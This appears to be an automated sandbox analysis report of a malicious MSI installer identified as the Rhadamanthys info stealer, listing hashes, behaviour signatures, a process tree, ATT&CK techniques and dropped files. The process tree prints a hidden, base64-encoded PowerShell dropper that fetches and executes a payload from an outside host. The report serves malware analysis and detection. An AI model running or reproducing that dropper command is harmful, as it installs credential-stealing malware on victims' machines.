Resubmissions

29-06-2024 14:38

240629-rzv2qasepl 10

29-06-2024 14:34

240629-rxnvmazblg 10

Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-06-2024 14:34

General

  • Target

    __x64___setup___x32__/setup.msi

  • Size

    34.8MB

  • MD5

    1086315ee22b1c20eb4aa7a57cbb8b6b

  • SHA1

    1c734fc3f48e355a438cfed270f927b3922ef0ac

  • SHA256

    d9324c156a90b828e3f110a871b6eca08bb6251fc34dcb8b570c05f48a6b642d

  • SHA512

    f6fdfd4751e9b717b7acef31973e34219d2c1e49869b956c27f2a675461ad70b4d727fefb8dba5910954ef8012232913e79549acaa75558015e4de24ee804c05

  • SSDEEP

    786432:wqqRkI57hVSZmlNdonqUuhGMCiEIS/vTis1Mscz:wq+T57jSZmGnqUezSTtqz

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://two-root.com/2506s.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 20 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3060
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4608
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32__\setup.msi
      1⤵
      • Enumerates connected drives
      • Event Triggered Execution: Installer Packages
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3648
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 18158756225F0DD95DE42D761BC84BA3
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:4944
      • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\"
        2⤵
        • Executes dropped EXE
        PID:4264
      • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe
        "C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:412
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3084
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAyADUAMAA2AHMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4908
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 1988
            4⤵
            • Program crash
            PID:3528
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 1864
            4⤵
            • Program crash
            PID:2724
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 1996
            4⤵
            • Program crash
            PID:3348
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3084 -ip 3084
      1⤵
        PID:4128
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3084 -ip 3084
        1⤵
          PID:3144
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3084 -ip 3084
          1⤵
            PID:3040

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Privilege Escalation

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Discovery

          Query Registry

          1
          T1012

          Peripheral Device Discovery

          1
          T1120

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\e57425b.rbs
            Filesize

            25KB

            MD5

            c47f052a53257c81a2f5c727b7f56e9f

            SHA1

            c55557705eeaf9a4e05eb31133c7f1809215119d

            SHA256

            f3a17e93795aac6d01207a8905af8e6e2b18b9a5aa6c6aed313d2bf4a71160ba

            SHA512

            3e5ab8dab32f304ff763e888a6b6b31bb964bad4338d392896182505d0dabe5c902f83fcf6144aa78eea9a1a884732b1cfd1fdbd2e971307ba1031857677d69f

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yy3wnoxo.its.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\UnRAR.exe
            Filesize

            494KB

            MD5

            98ccd44353f7bc5bad1bc6ba9ae0cd68

            SHA1

            76a4e5bf8d298800c886d29f85ee629e7726052d

            SHA256

            e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

            SHA512

            d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\nijboq.rar
            Filesize

            378KB

            MD5

            97bc4d7739d18cdd5276f9765790a06e

            SHA1

            c83bd0c26b22f8fe93564f1e3b215ebf1c858b21

            SHA256

            8e0ccd306430d7fee896305a965a06438bb6627ea92e92deef0d4ff02856b872

            SHA512

            45bb33d2a3014fa470b7a61026f3b2c79315579da4c36f9b69b2a5e0a9565c1304dff55af7ecfe3c34f250a379e8a5cc4b62103a820d710ed7a8337758a7e355

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnp.dll
            Filesize

            1003KB

            MD5

            8348f9b5827a749302e9d44dcc8e4e9e

            SHA1

            7493bd5ef1bafbe81d9f18e26ea9ed83bccea2e0

            SHA256

            5c16a3edddb5b1a8f602df239427b5bfe5b9a00ee21e40085a9da888f3d4d48d

            SHA512

            b4bdfe23fe5b9b344cfbdf376038452f74eff70d913b67e3f6593872ece72a5931303c515ef3112e10877cf37078a497a4dc30a828f3f7131f2418efcb3035c2

          • C:\Users\Admin\AppData\Roaming\Yiui Kisi Pri\PrivAci\rnpkeys.exe
            Filesize

            780KB

            MD5

            ae63517a3ce7949a2c084cd7541c2fd8

            SHA1

            8dafa610a0c3aa6ee2e50f657c90757bfae80336

            SHA256

            14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26

            SHA512

            fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

          • C:\Windows\Installer\MSI4314.tmp
            Filesize

            738KB

            MD5

            b158d8d605571ea47a238df5ab43dfaa

            SHA1

            bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

            SHA256

            ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

            SHA512

            56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

          • C:\Windows\Installer\MSI449E.tmp
            Filesize

            1.1MB

            MD5

            1a2b237796742c26b11a008d0b175e29

            SHA1

            cfd5affcfb3b6fd407e58dfc7187fad4f186ea18

            SHA256

            81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730

            SHA512

            3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

          • C:\Windows\Installer\MSI5CFC.tmp
            Filesize

            364KB

            MD5

            54d74546c6afe67b3d118c3c477c159a

            SHA1

            957f08beb7e27e657cd83d8ee50388b887935fae

            SHA256

            f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611

            SHA512

            d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

          • C:\Windows\Installer\e574258.msi
            Filesize

            34.8MB

            MD5

            1086315ee22b1c20eb4aa7a57cbb8b6b

            SHA1

            1c734fc3f48e355a438cfed270f927b3922ef0ac

            SHA256

            d9324c156a90b828e3f110a871b6eca08bb6251fc34dcb8b570c05f48a6b642d

            SHA512

            f6fdfd4751e9b717b7acef31973e34219d2c1e49869b956c27f2a675461ad70b4d727fefb8dba5910954ef8012232913e79549acaa75558015e4de24ee804c05

          • memory/412-159-0x0000012EDB000000-0x0000012EDB001000-memory.dmp
            Filesize

            4KB

          • memory/3084-163-0x00000000001E0000-0x0000000000208000-memory.dmp
            Filesize

            160KB

          • memory/3084-227-0x00000000047A0000-0x0000000004BA0000-memory.dmp
            Filesize

            4.0MB

          • memory/3084-231-0x0000000077440000-0x0000000077692000-memory.dmp
            Filesize

            2.3MB

          • memory/3084-162-0x00000000001E0000-0x0000000000208000-memory.dmp
            Filesize

            160KB

          • memory/3084-161-0x00000000001E0000-0x0000000000208000-memory.dmp
            Filesize

            160KB

          • memory/3084-229-0x00007FFEF68C0000-0x00007FFEF6AC9000-memory.dmp
            Filesize

            2.0MB

          • memory/3084-228-0x00000000047A0000-0x0000000004BA0000-memory.dmp
            Filesize

            4.0MB

          • memory/4608-232-0x00000000005D0000-0x00000000005D9000-memory.dmp
            Filesize

            36KB

          • memory/4608-234-0x0000000002570000-0x0000000002970000-memory.dmp
            Filesize

            4.0MB

          • memory/4608-237-0x0000000077440000-0x0000000077692000-memory.dmp
            Filesize

            2.3MB

          • memory/4608-235-0x00007FFEF68C0000-0x00007FFEF6AC9000-memory.dmp
            Filesize

            2.0MB

          • memory/4908-221-0x0000026BEF840000-0x0000026BEFD68000-memory.dmp
            Filesize

            5.2MB

          • memory/4908-220-0x0000026BEF140000-0x0000026BEF302000-memory.dmp
            Filesize

            1.8MB

          • memory/4908-185-0x0000026BEEF50000-0x0000026BEEF6C000-memory.dmp
            Filesize

            112KB

          • memory/4908-165-0x0000026BEEA50000-0x0000026BEEA72000-memory.dmp
            Filesize

            136KB